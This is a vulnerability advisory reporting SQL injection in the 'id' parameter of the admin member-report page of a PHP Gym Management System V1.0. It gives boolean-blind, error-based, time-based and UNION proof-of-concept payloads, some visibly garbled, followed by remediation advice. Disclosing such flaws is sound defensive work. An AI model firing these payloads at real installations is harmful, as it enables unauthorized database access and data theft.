Key Information Summary Vulnerability Details Affected Product: Gym Management System Vendor Homepage: https://codeastro.com/gym-management-system-in-php-mysql-with-source-code/ Affected/Fixed Version: V1.0 Vulnerable File: /Gym-System/admin/view-member-report.php?id=%206 Software Link: https://codeastro.com/gym-management-system-in-php-mysql-with-source-code/ Vulnerability Type: SQL Injection Root Cause: - A SQL injection vulnerability exists in the file /Gym-System/admin/view-member-report.php?id=%206. This occurs because user input in the 'id' parameter is not properly validated before being directly used in SQL queries, allowing attackers to forge input values and manipulate SQL queries to perform unauthorized operations. Impact: - Attackers can exploit this SQL injection vulnerability to gain unauthorized access to the database, leak sensitive data, tamper with data, take full control of the system, or cause service disruption, posing a serious threat to system security and business continuity. Description: - During the review of the "Gym Management System", I discovered a critical SQL injection vulnerability in the file /Gym-System/admin/view-member-report.php?id=%206. The vulnerability arises from insufficient validation of user input for the 'id' parameter, enabling attackers to inject malicious SQL queries. As a result, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information. Immediate remediation measures are required to ensure system security and protect data integrity. Vulnerability Details and POC Vulnerability Alias: 'id' parameter Payloads: ... Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=6' AND 8161=8161 AND 'LXYF'='LXYF Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=6' OR (SELECT 4971 FROM(SELECT COUNT(),CONCAT(0x716a707071,(SELECT (ELT(4971=4971,1))),0x717a6a71,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xFDh'='xFDh Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=6' AND (SELECT 6626 FROM (SELECT(SLEEP(5)))geNI) AND 'sDUF'='sDUF ... Type: UNION query Title: Generic UNION query (NULL) - 21 columns Payload: id=6' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a7071,(SELECT CONCAT(SUBSTRING((SELECT (ELT(500=500))),1,7),0x20,(SELECT VERSION()),0x20,(SELECT SUBSTRING(232519744,13,1)),0x20,FLOOR(RAND(0)2))),0x717a6a71,ETC ... Screenshots of Specific Information Obtained by Testing and Running sqlmap Tool Recommended Remediation 1. Use Prepared Statements and Parameter Binding: - Prepared statements prevent SQL injection by separating SQL code from user input data. When using prepared statements, user-provided values are treated as plain data and not parsed as SQL code. 2. Input Validation and Filtering: - Strictly validate and filter user input to ensure it conforms to expected formats. 3. Minimize Database User Privileges: - Ensure that database connection accounts have only the minimum necessary privileges, avoiding the use of high-privilege accounts (such as 'root' or 'admin') for routine operations. 4. Regular Security Audits**: - Conduct regular code and system security audits to promptly identify and fix potential security vulnerabilities.